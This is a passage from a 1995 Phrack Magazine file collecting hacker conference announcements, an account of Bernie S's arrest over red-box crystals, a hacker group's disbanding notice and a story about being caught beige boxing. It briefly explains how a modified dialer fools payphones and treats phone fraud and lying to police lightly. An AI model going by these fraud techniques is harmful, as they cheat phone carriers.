  1616. Meanwhile Mitnick becomes the fall guy for the world's ills, and
  1617. two guys methodically formulate a plot to get rich.  It worked!
  1618.  
  1619. Way to go, guys.
  1620.  
  1621.  
  1622.  
  1623.                          ==Phrack Magazine==
  1624.  
  1625.               Volume Six, Issue Forty-Seven, File 3 of 22
  1626.  
  1627.  
  1628.                            //   //  /\   //   ====
  1629.                           //   //  //\\ //   ====
  1630.                          ==== //  //  \\/   ====
  1631.  
  1632.                      /\   //  // \\    //  /===   ====
  1633.                     //\\ //  //   //  //   \=\   ====
  1634.                    //  \\/    \\ //  //   ===/  ====
  1635.  
  1636.                                  PART I
  1637.  
  1638. ------------------------------------------------------------------------------
  1639.  
  1640. -----BEGIN PGP SIGNED MESSAGE-----
  1641.  
  1642.  
  1643.  
  1644.  
  1645.   Phrack Magazine and Computer Security Technologies proudly present:
  1646.  
  1647.                      The 1995 Summer Security Conference
  1648.  
  1649.  SSSS  U    U  M     M  M     M   EEEEE   RRRR     CCCC   OOOO    N   N
  1650. S      U    U  MM   MM  MM   MM   E       R   R   C      O    O   NN  N
  1651.  SSS   U    U  M M M M  M M M M   EEE     RRRR    C      O    O   N N N
  1652.     S  U    U  M  M  M  M  M  M   E       R  R    C      O    O   N  NN
  1653. SSSS    UUUU   M     M  M     M   EEEEE   R   R    CCCC   OOOO    N   N
  1654.  
  1655.                                "SUMMERCON"
  1656.  
  1657.       June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia
  1658.  
  1659. This is the official announcement and open invitation to the 1995
  1660. incarnation of Summercon.  In the past, Summercon was an invite-only
  1661. hacker gathering held annually in St. Louis, Missouri.  Starting
  1662. with this incarnation, Summercon is open to any and all interested
  1663. parties:  Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
  1664. Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,
  1665. Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,
  1666. Programmers, Conspiracy Nuts, Musicians and Nudists.
  1667.  
  1668. LOCATION:
  1669.  
  1670. The Clarion Hotel is located in downtown Atlanta, 9 miles from
  1671. Hartsfield International Airport and just a few blocks from the
  1672. Peachtree Center MARTA Station.
  1673.  
  1674.  
  1675. Considering the exorbitant expenses involved with attending other
  1676. conferences of this type, Rooms at Summercon are reduced to
  1677.  
  1678.                 $65 per night for Single or Double Occupancy
  1679.  
  1680.       The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
  1681.                            Atlanta, GA 30303
  1682.        (404) 659-2660 or (800) 241-3828   (404) 524-5390 (fax)
  1683.  
  1684.  
  1685. No one likes to pay a hundred dollars a night.  We don't expect you
  1686. to have to.  Spend your money on room service, drinks in the hotel bar,
  1687. or on k-rad hacker t-shirts.  Remember:  Mention that you are attending
  1688. Summercon in order to receive the discount.
  1689.  
  1690. DIRECTIONS
  1691.  
  1692. 75/85 Southbound - Exit 97 (Courtland).  Go 3 blocks south on Courtland
  1693.           then turn left on Houston (John Wesley Dobbs Ave.)
  1694. 20 East - Exit 75/85 North at International.  Turn Left on Courtland at
  1695.           Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)
  1696. 20 West - Exit 75/85 North at International.  One block to Courtland
  1697.           and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)
  1698.  
  1699. Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's
  1700. International Airport will drop you off at many hotels in the downtown
  1701. area, including the Clarion.  The shuttle should be no more than 12
  1702. dollars.  Fares may be paid at the Airport Shuttle in the Ground
  1703. Transportation area of the Airport Terminal.
  1704.  
  1705. MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a
  1706. convenient and inexpensive way to negotiate most of the Atlanta area.
  1707. Take the MARTA train from the Airport to the Peach Tree Center Station.
  1708. Walk three blocks down Houston to the intersection of Houston and
  1709. Courtland.  The MARTA fare will be roughly 2 dollars.
  1710.  
  1711. Taxis - The average cab fare from Atlanta's Airport to the downtown area
  1712. is roughly 30 dollars.
  1713.  
  1714. CONFERENCE INFO
  1715.  
  1716. It has always been our contention that cons are for socializing.
  1717. "Seekret Hacker InPh0" is never really discussed except in private
  1718. circles, so the only way anyone is going to get any is to meet new people
  1719. and take the initiative to start interesting conversations.
  1720.  
  1721. Because of this, the formal speaking portion of Summercon will be
  1722. held on one day, not two or three, leaving plenty of time for people
  1723. to explore the city, compare hacking techniques, or go trashing and
  1724. clubbing with their heretofore unseen online companions.
  1725.  
  1726. The "Conference" will be held on June 3rd from roughly 11:00 am until
  1727. 6:00 pm with a 1 hour lunch break from 1:00 to 2:00.
  1728.  
  1729. NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM.  Audio Taping
  1730. and still photography will be permitted.
  1731.  
  1732.  
  1733. CURRENT LIST OF SPEAKERS:
  1734.  
  1735. Robert Steele   - Ex-Intelligence Agent, Founder and CEO of Open Source
  1736.                   Solutions (a private sector intelligence firm)
  1737.  
  1738.            Topic: Hackers from the Intelligence Perspective
  1739.  
  1740. Winn Schwartau  - Author of "Information Warfare" and "Terminal Compromise",
  1741.                   Publisher of Security Insider Report, and noted security
  1742.                   expert
  1743.  
  1744.            Topic: Electromagnetic Weaponry
  1745.  
  1746. Bob Stratton    - Information Security Expert from one of America's largest
  1747.                   Internet service providers
  1748.  
  1749.            Topic: The Future of TCP/IP Security
  1750.  
  1751. Eric Hughes     - Cryptography Expert and founding member of the "Cypherpunks"
  1752.  
  1753.            Topic: Cryptography, Banking, and Commerce
  1754.  
  1755. Annaliza Savage - London-based Director/Producer
  1756.  
  1757.            Topic: Discussion of her documentary "Unauthorized Access"
  1758.                   (Followed by a public screening of the film)
  1759.  
  1760. Chris Goggans   - Editor of Phrack Magazine and Summercon M.C.
  1761.  
  1762.            Topic: introductions, incidentals and a topic which is sure
  1763.                   to culminate in an international incident.
  1764.  
  1765.  
  1766. (Other Speakers May Be Added - Interested parties may contact scon@fc.net)
  1767.  
  1768. COSTS
  1769.  
  1770. Since other cons of this type have been charging from 25 to 40 dollars
  1771. entry fees, we are only charging 10 dollars.  Yes, that's correct,
  1772. TEN (10) dollars in US currency.  Money is far too scarce among the
  1773. hacker community to fleece everyone for money they will probably need
  1774. to eat with or pay for their hotel rooms.
  1775.  
  1776.  
  1777. WHAT TO DO IN ATLANTA:
  1778.  
  1779. To attempt to make everyone's stay in Atlanta more exciting, we are
  1780. contacting local establishments to arrange for special discounts and/or
  1781. price reductions for Summercon attendees.  Information will be handed
  1782. out regarding these arrangements at the conference.
  1783.  
  1784. Atlanta is a happening town.
  1785.  
  1786. Touristy Stuff                            Party Time
  1787.  
  1788.   The World of Coca-Cola                    Buckhead
  1789.   Underground Atlanta                       The Gold Club
  1790.   Georgia Dome (Baseball?)                  (Countless Other Clubs and Bars)
  1791.   Six Flags
  1792.  
  1793. CONTACTING SUMMERCON SPONSORS
  1794.  
  1795. You can contact the Summercon sponsors by several means:
  1796.  
  1797.     E-mail:     scon@fc.net
  1798.  
  1799.        WWW:     http://www.fc.net/scon.html
  1800.  
  1801. Snail Mail:     Phrack Magazine
  1802.   603 W. 13th #1A-278
  1803.   Austin, TX 78701
  1804.  
  1805.  
  1806. If deemed severely urgent, you can PGP your email with the following PGP
  1807. key:
  1808.  
  1809. - -----BEGIN PGP PUBLIC KEY BLOCK-----
  1810. Version: 2.6
  1811.  
  1812. mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
  1813. Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
  1814. Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
  1815. tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
  1816. =evjv
  1817. - -----END PGP PUBLIC KEY BLOCK-----
  1818.  
  1819.  
  1820. See you in Atlanta!
  1821.  
  1822.  
  1823.  
  1824.  
  1825. -----BEGIN PGP SIGNATURE-----
  1826. Version: 2.6
  1827.  
  1828. iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4
  1829. 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q
  1830. mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5
  1831. uRix2FrftCY=
  1832. =m/Yt
  1833. -----END PGP SIGNATURE-----
  1834.  
  1835. ------------------------------------------------------------------------------
  1836.  
  1837. UNAUTHORIZED ACCESS
  1838.  
  1839. "Unauthorized Access [is] a documentary that tells the story of the
  1840. computer underground from our side, it captures the hacker world
  1841. from Hamburg to Los Angeles and virtually everywhere in between."
  1842.                                         2600  The Hacker Quarterly
  1843.  
  1844. Computers are becoming an integral part of our everyday existence.
  1845. They are used to store and send a multitude of information, from
  1846. credit reports and bank withdrawals, to personal letters and highly
  1847. sensitive military documents.  So how secure are our computer
  1848. systems?
  1849.  
  1850. The computer hacker is an expert at infiltrating secured systems,
  1851. such as those at AT&T, TRW, NASA or the DMV.  Most computer systems
  1852. that have a telephone connection have been under siege at one time
  1853. or another, many without their owner's knowledge.  The really good
  1854. hackers can reroute the telephone systems, obtain highly sensitive
  1855. corporate and government documents, download individual's credit
  1856. reports, make free phone calls globally, read private electronic
  1857. mail and corporate bulletins and get away without ever leaving a
  1858. trace.
  1859.  
  1860. So who are these hackers?  Just exactly WHAT do they do and WHY do
  1861. they do it?  Are they really a threat?  What do they DO with the
  1862. information that they obtain?  What are the consequences of their
  1863. actions? Are hackers simply playing an intellectual game of chess
  1864. or are hackers using technology to fight back and take control of
  1865. a bureaucratic system that has previously appeared indestructible?
  1866.  
  1867. Unauthorized Access is a documentary that demistifies the hype and
  1868. propaganda surrounding the computer hacker.  Shot in 15 cities
  1869. and 4 countries, the film hopes to expose the truths of this subculture
  1870. focusing on the hackers themselves.
  1871.  
  1872. Unauthorized Access is a view from inside the global underground.
  1873.  
  1874. For a PAL (European) copy send a cheque/postal order for 15 British
  1875. Pounds or $25 for NTSC (American) standard to:
  1876.  
  1877. Savage Productions
  1878. Suite One
  1879. 281 City Road
  1880. London  EC1V 1LA
  1881.  
  1882. ------------------------------------------------------------------------------
  1883.  
  1884.                             ACCESS ALL AREAS
  1885.                            Hacking Conference
  1886.  
  1887.                           1st - 2nd July, 1995
  1888.                           (Saturday  & Sunday)
  1889.                        King's College, London, UK
  1890.  
  1891.  
  1892. -------------------------------WHAT-IT-IS---------------------------------
  1893.  
  1894. The first UK hacking conference, Access All Areas, is to be run in London
  1895. later this year.  It is aimed at hackers, phone phreaks, computer security
  1896. professionals, cyberpunks, law enforcement officials, net surfers,
  1897. programmers, and the computer underground.
  1898.  
  1899. It will be a chance for all sides of the computer world to get together,
  1900. discuss major issues, learn new tricks, educate others and meet "The
  1901. Enemy".
  1902.  
  1903.  
  1904.  
  1905. -------------------------------WHERE-IT-IS--------------------------------
  1906.  
  1907. Access All Areas is to be held during the first weekend of July, 1995 at
  1908. King's College, London.  King's College is located in central London on
  1909. The Strand and is one of the premier universities in England.
  1910.  
  1911.  
  1912.  
  1913. -----------------------------WHAT-WILL-HAPPEN-----------------------------
  1914.  
  1915. There will be a large lecture theatre that will be used for talks by
  1916. computer security professionals, legal experts and hackers alike.  The
  1917. topics under discussion will include hacking, phreaking, big brother and
  1918. the secret services, biometrics, cellular telephones, pagers, magstrips,
  1919. smart card technology, social engineering, Unix security risks, viruses,
  1920. legal aspects and much, much more.
  1921.  
  1922. Technical workshops will be running throughout the conference on several
  1923. topics listed above.
  1924.  
  1925. A video room, equipped with multiple large screen televisions, will be
  1926. showing various films, documentaries and other hacker related footage.
  1927.  
  1928. The conference facilities will also include a 10Mbps Internet link
  1929. connected to a local area network with various computers hanging off of it
  1930. and with extra ports to connect your laptop to.
  1931.  
  1932.  
  1933.  
  1934. ------------------------------REGISTRATION--------------------------------
  1935.  
  1936. Registration will take place on the morning of Saturday 1st July from
  1937. 9:00am until 12:00 noon, when the conference will commence.  Lectures and
  1938. workshops will run until late Saturday night and will continue on Sunday
  1939. 2nd July from 9:00am until 6:00pm.
  1940.  
  1941.  
  1942.  
  1943. ----------------------------------COST------------------------------------
  1944.  
  1945. The price of admission will be 25.00 British pounds (approximately US $40.00)
  1946. at the door and will include a door pass and conference programme.
  1947.  
  1948.  
  1949.  
  1950. -----------------------------ACCOMMODATION--------------------------------
  1951.  
  1952. Accommodation in university halls of residence is being offered for the
  1953. duration of the conference.  All prices quoted are per person, per night
  1954. and include full English breakfast. (In British pounds)
  1955.  
  1956.  
  1957.                              SINGLE       TWIN
  1958.         WELLINGTON HALL       22.00       16.75
  1959.  
  1960.  
  1961. Special prices for British and Overseas university students, holding
  1962. current student identification, are also available - please call King's
  1963. Campus Vacation Bureau for details.
  1964.  
  1965. All bookings must be made directly with the university.  They accept
  1966. payment by cash, cheque and credit card.
  1967.  
  1968. To making a booking call the following numbers...
  1969.  
  1970.  
  1971.         KING'S CAMPUS VACATION BUREAU
  1972.  
  1973.         Telephone : +44 (0)171 351 6011
  1974.         Fax       : +44 (0)171 352 7376
  1975.  
  1976.  
  1977.  
  1978. ----------------------------MORE-INFORMATION------------------------------
  1979.  
  1980. If you would like more information about Access All Areas, including
  1981. pre-registration details then please contact one of the following...
  1982.  
  1983.  
  1984.         Telephone : +44 (0)973 500202
  1985.         Fax       : +44 (0)181 224 0547
  1986.         Email     : info@phate.demon.co.uk
  1987.  
  1988.  
  1989.  
  1990. ------------------------------------------------------------------------------
  1991.  
  1992.                 D I S T R I B U T E  W I D E L Y
  1993.  
  1994.                  *****FIRST CALL FOR PAPERS*****
  1995.  
  1996.                         InfoWarCon '95
  1997.  
  1998.                A 2 Day International Symposium
  1999.                      on Information Warfare
  2000.  
  2001.                       September 7-8, 1995
  2002.                    Stouffer Concourse Hotel
  2003.                         Arlington, VA
  2004.  
  2005.                         Presented by:
  2006.              National Computer Security Association
  2007.                Winn Schwartau and Interpact, Inc.
  2008.                    Robert Steele and OSS, Inc.
  2009.  
  2010.  
  2011. CONFERENCE OVERVIEW:
  2012.  
  2013. The  Information  Warfare Conference (InfoWarCon)  is  our third
  2014. international  conference  dedicated to the  exchange  of  ideas,
  2015. policies,  tactics, weapons, methodologies and defensive  posture
  2016. of Information Warfare on a local, national, and global basis.
  2017.  
  2018. InfoWarCon will bring together international experts from a broad
  2019. range  of disciplines to discuss and integrate concepts  in  this
  2020. rapidly  evolving field.  Attendees will intensely interact  with
  2021. the  speakers  and presenters as well as each other  to  increase
  2022. each other's understanding of the interrelatedness of the topics.
  2023.  
  2024. While  there are many interpretations of Information  Warfare  by
  2025. different groups, the current working definition we employ is:
  2026.  
  2027.      Information  Warfare is the use of information and  informa
  2028.      tion systems as weapons in a conflict where information  and
  2029.      information systems are the targets.
  2030.  
  2031. Information  Warfare  is broken down into three  categories,  and
  2032. InfoWarCon speakers and attendees will interactively examine them
  2033. all:
  2034.  
  2035.      Class  I:  Personal Privacy.  "In Cyberspace You Are  Guilty
  2036.      Until Proven Innocent."  The mass psychology of information.
  2037.      Privacy versus stability and law enforcement.
  2038.  
  2039.      Class  II: Industrial and Economic Espionage.  Domestic  and
  2040.      international  ramifications  and  postures  in  a  globally
  2041.      networked, competitive society.
  2042.  
  2043.      Class III: Global Information Warfare.  Nation-state  versus
  2044.      Nation-state  as an alternative to convention  warfare,  the
  2045.      military perspective and terrorism.
  2046.  
  2047. THE CONFERENCE
  2048.  
  2049. The  conference  is designed to be interactive -  with  extensive
  2050. interaction  between all participants. The  preliminary  contents
  2051. and discussions will focus on:
  2052.  
  2053.  - What is Information Warfare?
  2054.  - What Are the Targets?
  2055.  - Protecting the Global Financial Infrastructure
  2056.  - Military Perspectives on InfoWar
  2057.  - InfoWar Vs. Non-Lethal Warfare
  2058.  - Defending the U.S. Infrastructure
  2059.  - The Intelligence Community and Information
  2060.  - Open Source Intelligence
  2061.  - The Psychology of Information
  2062.  - Privacy Balances
  2063.  - Information As the Competitive Edge
  2064.  - International Cooperation
  2065.  - Denial of Service
  2066.  - Cyber-Terrorism
  2067.  - Offensive Terrorism
  2068.  - Offensive InfoWar Techniques
  2069.  - Defensive InfoWar Postures
  2070.  - Education and Awareness Training
  2071.  - Corporate Policy
  2072.  - Government Policy
  2073.  - Global Policy
  2074.  - Espionage
  2075.  - Export Controls of Information Flow
  2076.  - The Legal Perspective
  2077.  - The New Information Warriors
  2078.  
  2079. Plenary sessions will accommodate all attendees, while  break-out
  2080. sessions will provide more intimate presentations and interactiv
  2081. ity on topics of specific interests.
  2082.  
  2083. SUBMISSIONS:
  2084.  
  2085. Submission  for papers are now be accepted.  We are  looking  for
  2086. excellent speakers and presenters with new and novel concepts  of
  2087. Information Warfare.  You may submit papers on the topics  listed
  2088. above,  or on others of interest to you, your company or  govern
  2089. ment.
  2090.  
  2091. We  welcome innovative thought from the private sector, the  gov
  2092. ernment  (civilian, military and intelligence) and  the  interna
  2093. tional  community.  Submissions must be received by May 1,  1995,
  2094. and  notification  of  acceptance will occur  by  June  1,  1995.
  2095. Please    submit    2-3   page    presentation    outlines    to:
  2096.  
  2097.                         winn@infowar.com.
  2098.  
  2099. All  submissions  and the contents of InfoWarCon '95 will  be  in
  2100. English.   If you must submit a hard copy: Fax:  813.393.6361  or
  2101. snail  mail  to:  Interpact, Inc. 11511 Pine  St.,  Seminole,  FL
  2102. 34642
  2103.  
  2104. All submissions and presentation should be unclassified, as  they
  2105. will become Open Source upon submission and/or acceptance.
  2106.  
  2107. SPONSORS:
  2108.  
  2109. The Information Warfare Symposium is currently choosing  sponsors
  2110. for various functions.
  2111.  
  2112.  Continental Breakfast, Day 1 and Day 2
  2113.  Morning Coffee Break, Day 1 and Day 2
  2114.  Lunch, Day 1 and Day 2
  2115.  Afternoon Coffee Break, Day 1 and Day 2
  2116.  Cocktail Party, Day 1
  2117.  
  2118. Each Corporate or Organizational sponsor will be included in  all
  2119. promotional  materials and  Symposium function.   For more infor-
  2120. mation, contact Paul Gates at  the NCSA.  Voice: 717.258.1816  or
  2121. email: 747774.1326@Compuserve.com.
  2122.  
  2123. EXHIBITS:
  2124.  
  2125. Limited space is available for table-top displays for  commercial
  2126. or  governmental products, services, educational or other  promo
  2127. tion. For further information, contact Paul Gates at the National
  2128. Computer Security  Association. 717.258.1816
  2129.  
  2130. REGISTRATION:
  2131.  
  2132.      Payment made BEFORE July 1, 1995:
  2133.  
  2134.                 (   )  $445.00     NCSA Member/OSS Attendee
  2135.   (   )  $545.00     All others
  2136.  
  2137.      Payment made AFTER July 1, 1995:
  2138.  
  2139.   (   )  $495.00     NCSA Members/OSS Attendees
  2140.   (   )  $595.00     All others
  2141.  
  2142. (  )  I'M INTERESTED, but would like more information sent to the
  2143.       address above.  Please include a free copy of your 32 page
  2144.       "Information Security Resource Catalog".
  2145.  
  2146. (  )  I'd like to know more about NCSA on-site training, security
  2147.       audits and  consulting services.  Please have someone give me
  2148.       a call.
  2149.  
  2150. MAIL OR FAX TO:
  2151.  
  2152.                  National Computer Security Association
  2153.                  10 South Courthouse Avenue
  2154.                  Carlisle, PA 17013
  2155.                  Phone 717-258-1816 or FAX 717-243-8642
  2156.                  EMAIL:       74774.1326@compuserve.com
  2157.                  CompuServe:  GO NCSAFORUM
  2158.  
  2159.   Winn Schwartau Interpact, Inc.
  2160.   Information Security & Warfare
  2161.   V:813.393.6600 F:813.393.6361
  2162.             Email: Winn@Infowar.Com
  2163.  
  2164. ------------------------------------------------------------------------------
  2165.  
  2166.     Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested
  2167. on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
  2168. of a device to commit Telecommunications fraud charges. He is being held in
  2169. Delaware County Prison in lieu of $100,000.00 Bail. His story follows.
  2170.  
  2171.     On the evening of the 13th Bernie S. received a page from his mail drop.
  2172. Some people he knew from Florida had stopped in at his mail drop thinking
  2173. it was his address.  They were looking to purchase several 6.5 Mhz Crystals.
  2174. These crystals when used to replace the standard crystal in the RADIO SHACK
  2175. Hand Telephone dialer, and with some programming, produce tones that trick
  2176. pay phones into believing they have received coins.  These are commonly
  2177. referred to as "red boxes" and got their name from an actual red box pulled
  2178. from a pay phone in the late seventies by some curious person.
  2179.  
  2180.     Ed Cummings met these people at a local 7-11 (which 7-11?) where he was
  2181. to sell the widely used electronic timing crystals for roughly $4 a piece.
  2182. The purchaser only had two twenty dollar bills and Ed Cummings no change.
  2183. Ed Cummings went into the 7-11 to get some change to make the transaction.
  2184. A police officer noticed a van parked in the parking lot of the 7-11 with
  2185. more several African Americans inside.  As Ed was leaving the 7-11 he noticed
  2186. fifteen police cars pulling into the parking lot of the 7-11.
  2187.  
  2188.     Next thing he knew the police were asking him if they could `rifle`
  2189. through his car.  He said no.  Moments later as he was talking to a Detective
  2190. and noticed another police officer going through his car.  He asked the officer
  2191. to stop.  They did not, in all the police confiscated a few hundred 6.5Mhz
  2192. crystals (which he resells for roughly $4 a piece) and a large box of 100
  2193. dialers.  The police told him they would get back to him,  and he could have
  2194. his electronics back if the contents of the bag were legal.  In the contents
  2195. of the seized items was one modified dialer, that a customer returned after
  2196. modification explaining that it did not work, a broken red box.
  2197.  
  2198.     The next day Ed `Bernie S.` Cummings was over at a friend`s house working
  2199. on their computer when eight to ten plain clothed armed men burst into the
  2200. house and ordered him and his friends to freeze.  They cuffed him and took him
  2201. to a holding cell (what jail?).  There he was left without a blanket or jacket
  2202. to sleep with in the cold cell.
  2203.  
  2204.     That evening the Secret Service had been called in when someone figured
  2205. out what the dialers and crystals would do when put together.  The
  2206. United States Secret Service found his home and entered it, while they were
  2207. questioning him.
  2208.  
  2209.     The next morning at his arraignment he was finally told of the charges
  2210. he was being held upon. They were Two misdemeanor Charges of manufacture,
  2211. Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful
  2212. use of a computer charges. His bail was automatically set to $100,000.00
  2213. because Ed Cummings refused talk with the police without his attorney present.
  2214.  
  2215.     The Secret Service presented to the judge a 9 page inventory of what
  2216. they had found in his home.   On that inventory there 14 computers. 2 printers.
  2217. more Boxes of bios chips for the systems he worked with. Eprom burners which
  2218. the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"
  2219. Eproms are used in everything from Automobile computers to personal computers.
  2220. They also confiscated his toolbox of screw drivers, wire clippers and other
  2221. computer oriented tools he used for his consulting job.
  2222.  
  2223.     The Judge dropped the Two unlawful use of a computer charges due to
  2224. the fact that the evidence was circumstantial and the county had no actual
  2225. evidence that Ed had ever used the computers in question.
  2226.  
  2227.     As of 3/27/1995 Ed Cummings is still in Delaware County Prison
  2228. awaiting his trial.  His trial has not yet been scheduled and Ed will most
  2229. likely not raise the One Hundred Thousand Dollars needed to be released on
  2230. bail.
  2231.  
  2232. ------------------------------------------------------------------------------
  2233.  
  2234. "Don't believe the hype."  -  Public Enemy, 1988
  2235.  
  2236. This file's purpose is to clear up any misconceptions about the recent
  2237. situation that has come upon the sociopolitical group known as KoV.
  2238.  
  2239. As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for
  2240. ANYTHING. We have received several tip-offs from private sources regarding
  2241. a supposed "FBI investigation" of our group that is purported to be active
  2242. at this very minute. However, with the exception of a few VERY suspicious
  2243. incidents and coincidences, there has been NO HARD EVIDENCE thus far about
  2244. ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for
  2245. the integrity of our innocence, we must stress that nothing has gone down.
  2246.  
  2247. Yet.
  2248.  
  2249. We have very good reason to believe that a few of those among us are about
  2250. to be charged with various false accusations by a local university. However
  2251. the current mental state of the person in charge of this charade is also in
  2252. question. Therefore it would be logical to assume nothing. The conflicting
  2253. tip-offs, rumors, warnings and threats that we have received make it even
  2254. more difficult to get a clear picture of exactly what is going on. We have
  2255. heard so many things from so many different sources, both credible and
  2256. questionable, that we would be hard-pressed to give an accurate evaluation
  2257. of the current state of things.
  2258.  
  2259. What we can say for sure, however, is that KoV officially died on Monday,
  2260. January 23, 1995, along with its communications network, KoVNet. This
  2261. promises to be a great loss to the open-minded and sociopolitical community
  2262. as well as the free-thinkers and activists who supported us so generously.
  2263. Our reasons for disbanding the group were many, but the foremost was in
  2264. light of the current situation we are facing.
  2265.  
  2266. Consider this last obstacle our final, stalwart stand against the evils of
  2267. AmeriKKKan government and its various greedy, capitalistic agencies.
  2268. From the moment of KoV's conception, they have publicly sought to destroy
  2269. us; to silence our questioning of authority, to oppress our free-thinking
  2270. minds, and to close off our intellectual channels of communication. They
  2271. have even gone so far as to stalk us in public places. 'Tis a shame indeed.
  2272.  
  2273. If you have any questions or if you wish to contact us for any reason,
  2274. you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".
  2275. I will try to post further updates of this saga to CiPNet, ThrashNet,
  2276. QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.
  2277. We would appreciate any support that other h/p, art or political groups can
  2278. lend us. Until then, my friends...
  2279.  
  2280. -Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV
  2281.  
  2282. ------------------------------------------------------------------------------
  2283.  
  2284.                 What happens when you are caught beige boxing.
  2285.  
  2286.                         by Rush 2
  2287.  
  2288.  
  2289.         Yeah yeah, I'm the only one.  But here is a generally interesting
  2290.      description of everything to getting caught to arraignment.
  2291.  
  2292.         Well about 5 months ago i needed to set up a conference really quick..
  2293.      it was about 12:00  (never knew there was a 10:00 pm curfew in that area)
  2294.      and went to a 25 pair box at this local strip mall.  Well I was out there
  2295.      the box was already open and I was just about to start testing pairs to
  2296.      see which was connected and what wasn't.
  2297.  
  2298.         All of a sudden, i hear this loud screeching sound of a car coming
  2299.      to a skid from doing about 90mph.  I turned and saw that typically dirty
  2300.      squad car about to hit me.. you know the car, mud and dust on the tires
  2301.      and body, coffee and smudge marks all over the windshield.  i got on my
  2302.      bike and started to run.  Now the thing is I COULD have gotten away.. the
  2303.      pathetic excuse for a cop had run not more than 10 yards after me and
  2304.      decided that I was a threat so he pulled his handgun and yelled.  I saw
  2305.      this and thought it would be wiser to stop than get shot.
  2306.  
  2307.         Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
  2308.      not know i was less than a half mile from a police station and they were
  2309.      looking for a prowler in the general area.  The police did the normal,
  2310.      called me scum, asked me what i was doing, searched me until they were
  2311.      satisfied...  than picked me up and threw me in the car... the funny
  2312.      thing was they didn't see my phone until they threw me into the back seat
  2313.      and the cord fell out.. (they never saw the page of notes and 'naughty'
  2314.      material in my pocket though it was about 4 inches thick and sticking out
  2315.      that a blind man could see it.
  2316.  
  2317.         Well they got me to the station and pried my info out, and called my
  2318.      father... I came up with a good enough story about some made up user
  2319.      who told me to go across the street and plug in..  then I was told I
  2320.      would be dealt with in the next week...  I did not receive anything for
  2321.      three and a half months.
  2322.  
  2323.         Once the time came for the arraignment (for a juvenile they called it
  2324.      an intake).  I got to go to the police station, sit for about 3 hours (as
  2325.      if i thought they would be on time) until I waited for my probation
  2326.      officer. Finally she got there and we proceeded to talk.  She explained
  2327.      all of the charges and my lawyer (interesting guy) laughed, I was being
  2328.      charged with prowling (could be disputed I was on a public sidewalk and
  2329.      there in that strip mall is a 24 hr laundry mat), loitering (again that
  2330.      could be disputed), and attempted theft of services (though I NEVER even
  2331.      plugged in).
  2332.  
  2333.         After this was all said i spent the next hour talking with the lady
  2334.      in private.  I immediately found she had an interest in computers and was
  2335.      having a problem with her home pc.  So I easily changed the topic to my
  2336.      fascination in computers and solved her problem with her computer, and
  2337.      answered at least 50 questions about them.  In the last 10-15 minutes of
  2338.      the conversation all i could get from her were statements about how
  2339.      impressed and how intrigued she was with me.  She ended up giving me a
  2340.      look (that was hard to judge but i am staying away from this chick) that
  2341.      was either confusion or attraction, slipped me a card with her home phone
  2342.      number and name and called back in my lawyer and parents.
  2343.  
  2344.         Once they got back in, all that she really said was I was a great boy,
  2345.      that she would like to see me do more with my time besides computers, and
  2346.      that she was taking my sentence of 12 months formal probation with 300
  2347.      hours of community service to 3 months of informal probation with 30
  2348.      hours of community service.  That and she said bell was asking her what
  2349.      to do and she would tell them that it was a non issue since I did not
  2350.      plug in and even if I had it would not be their concern unless I had
  2351.      plugged in to the telco access part of the network interface.
  2352.  
  2353.         Well I have yet to receive official record of having to perform
  2354.      the community service or the probation but I called my probation officer
  2355.      yesterday and said she wasn't putting the community service into the
  2356.      punishment and it has been an equivalent amount of time to just say that
  2357.      since I haven't gotten in trouble since she will count the probation as
  2358.      already served.  Luckily she based all other needs of me on the report
  2359.      from a teacher, and with my luck she picked the one teacher, my computers
  2360.      teacher, that no matter what I did or said would lie and say I didn't.
  2361.  
  2362.  
  2363.         Thanks to erikb for publishing this, and greets to CXrank, paradox,
  2364.      dark phiber, the fat cop (who spilled his coffee and box of donuts
  2365.      coming after me) that made this all possible,  and to everyone else.
  2366.  
  2367.  
  2368.                         -rush 2
  2369.             http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html
  2370.  
  2371.  
  2372.                 Look for My site, unforeseen danger soon to be on a 28.8 slip
  2373.             and by the end of the summer on a 500k slip connect.
  2374.  
  2375.  
  2376. ------------------------------------------------------------------------------
  2377.  
  2378. [Something found on IRC]
  2379.  
  2380. Danny Partridge         Emmanuel Goldstein
  2381. (AKA Danny Bonaduce:    (AKA Eric Corley:
  2382. a child star from       the child-like publisher
  2383. "The Partridge Family"  of 26oo magazine.
  2384. ----------------------  ------------------
  2385.  
  2386. Hosts a boring local    Hosts a boring local
  2387. radio program.          radio program.
  2388.  
  2389. Quasi Celebrity         Quasi Celebrity
  2390. Status among            Status among
  2391. 70's freaks             telephone phreaks
  2392.  
